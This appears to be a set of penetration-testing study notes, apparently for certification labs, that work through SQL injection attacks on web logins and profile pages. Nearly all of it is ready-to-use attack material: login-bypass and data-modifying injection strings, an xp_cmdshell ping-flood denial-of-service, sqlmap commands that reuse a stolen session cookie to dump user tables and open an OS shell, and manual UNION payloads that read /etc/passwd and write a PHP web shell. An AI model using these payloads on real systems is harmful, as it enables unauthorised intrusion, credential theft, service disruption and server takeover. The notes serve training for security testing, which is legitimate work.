• Log on without valid credentials
    • Test for SQL Injection
    • Create your own user account
    • Create your own database
    • Directory listing
    • Enforce Denial-of-Service attacks
    • Use Nstalker
    • Use SQLMAP

 

From Windows box – to test for sql injection login vulnerability

A.      Goto website LOGIN BOX. Type the query blah' or 1=1 -- in the Username field (as your login name), and leave the password field empty. Press enter to see if it logs you in

B.      To create user in vulnerable database. Type blah';insert into login values ('tim','bingo123'); -- in the Username field, and click Log in.

C.      To creat a database , type blah';create database mydatabase; -- in the Username field, leave the Password field empty, and click Log in.

In the above query, mydatabase is the name of the database, that you are going to create using the SQL Injection query

D.      To Perform a DOS attack -  type blah';exec master..xp_cmdshell 'ping www.website.com -l 65000 -t'; -- in the Username field, leave the Password field empty, and click Log in.    In the above query, you are performing a ping for the www.website.com website using an SQL Injection query: -l is the sent buffer size, and -t refers to pinging the specified host.

Admin logins - https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

 

USE N-Stalker to look for vulnerabilities

From Windows box

A.      Run Nstalker – Enter URL – Try OWASUP scan – Click Start scan

B.       On completion of the scan, the Results Wizard appears. Select Save scan results (under Session Management Options) and Keep scan session for further analysis (under Next Steps), and click Next.

 

 

USE SQL Map to find DB info (NB NO SPACES IN LOTS OF COMMANDS)

 

A.      Assume that you are registered user in the http://www.website.com website. And you want to crack the passwords of the other users

Open a web browser and type http://www.website.com and press Enter in the address bar. Moviescope webpage appears, login into the Moviescope as Username: sam and Password: test@123 and click Login.

Once you are logged into the website click View Profile tab, and make a note of the URL in the address bar of the browser.

Right-click any where on the webpage and click Inspect Element (Q) from the context menu as shown in the screenshot.

B.       Developer Tools section appears, click Console tab and type document.cookie in the lower left corner of the browser and press Enter. Select the cookie value and right-click and Copy the value

C.      Open a terminal window

D.      Type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step ”> --dbs and press Enter. 

E.    Do you want to skip test payloads specific for other DBMSes warning appears, type Y and press Enter. Do you want to include all tests for ‘Micorsoft SQL Server’ extending provided level warning appears type Y and press Enter. Do you want to keep testing the others warning appears, type N and press Enter

F.       This will show the databases present in MS SQL Server. It also displays information about the web server operating system, web application technology and the back-end DBMS

G.      To determine the tables associated with the website.com database. Now type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous  step”> -D <databasename> --tables and press Enter.

H.      For extracting columns information, you need to issue the following sqlmap query. Type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step”> -D <Database name> -T <Table Name> --columns and press Enter.

I.         To get all info from User_Login table. type sqlmap -u “http://www.moviescope.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in step #5”> -D moviescope -T User_Login --dump and press Enter to dump the all User_Login table content. Test retrieved passwords on website

J.        To open a COMMAND SHELL. type sqlmap -u “http://www.website.com/viewprofile.aspx?id=1” --cookie=<”cookie value which you have copied in previous step”> --os-shell and press Enter.

K.       From here you can type hostname or ipconfig to get details of machine you have compromised.

https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

https://resources.infosecinstitute.com/important-sqlmap-commands/#gref


MYSQL

Connect to local database

mysql -u zabbix -D zabbixdb -p

 

SQLMAP

Use burpsuite to capture login request

Save login request to login.req

sqlmap r login.req –level 5

 

Search for databases

sqlmap –u http://192.168.1.1/index.php?par= –dbs

 

Checking privileges of the users in database

sqlmap –u 192.168.1.124/sqli/Less-1/?id=1 –privileges

 

Reading a file from the web server

sqlmap -u 192.168.1.124/sqli/Less-1/?id=1 –file-read=/xampp/htdocs/index.php –batch

 

Dump Username and Password

sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –dump -threads=5

 

Dump tables

sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –tables –-dump

sqlmap –u http://192.168.1.1/index.php?par= –dbs –D dbname –T tablename –-dump

 

 Automated Shell

sqlmap -u http//192.168.1.1/comment.php?id123 –dbms=mysql –os-shell

sqlmap -u http://10.1.1.1/login.php –forms –level 5 –risk 3 –string “The password you entered was not valid.” –dbs –batch

sqlmap -l trace.txt –dbs (RDBMS Enum)

sqlmap -l trace.txt -D <db> –tables (Dump tables)

sqlmap -l trace.txt -D <db> -T <table> –dump (Dump table content)

 

Crawl links

sqlmap -u http://192.168.1.1 –crawl=1

sqlmap -u http:// 192.168.1.1 –forms –batch –crawl=5 –cookie=jsessionid=1234 –level=5 –risk=3

 

Manual sql injection commands

Check for sqli vulnerability

?id=1′

 

Find the number of columns

?id=1 order by 9 — –

 

Find space to output db

?id=1 union select 1,2,3,4,5,6,7,8,9 — –

 

 Get username of the sql-user

?id=1 union select 1,2,3,4,user(),6,7,8,9 — –

Get version

?id=1 union select 1,2,3,4,version(),6,7,8,9 — –

 

Get all tables

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables — –

 

Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = ‘users’ — –

 

Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

 

 Read file

?id=1 union select 1,2,3,4, load_file(‘/etc/passwd’) ,6,7,8,9 — –

?id=1 union select 1,2,3,4, load_file(‘/var/www/login.php’) ,6,7,8,9 — –

 

Create a file and call it to check if really created

?id=1 union select 1,2,3,4,’this is a test message’ ,6,7,8,9 into outfile ‘/var/www/test’ — –

?id=1 union select 1,2,3,4, load_file(‘/var/www/test’) ,6,7,8,9 — –

 

Create a file to get a shell

?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>’ ,6,7,8,9 into outfile ‘/var/www/shell.php’ — –

?id=1 union select null,null,null,null, load_file(‘/var/www/shell.php’) ,6,7,8,9 — –

Then go to browser and see if you can execute commands

http://<targetip>/shell.php?cmd=id

 

https://jensoroger.wordpress.com/2019/02/28/ceh-practical-lpt-master-ctf-notes-in-general/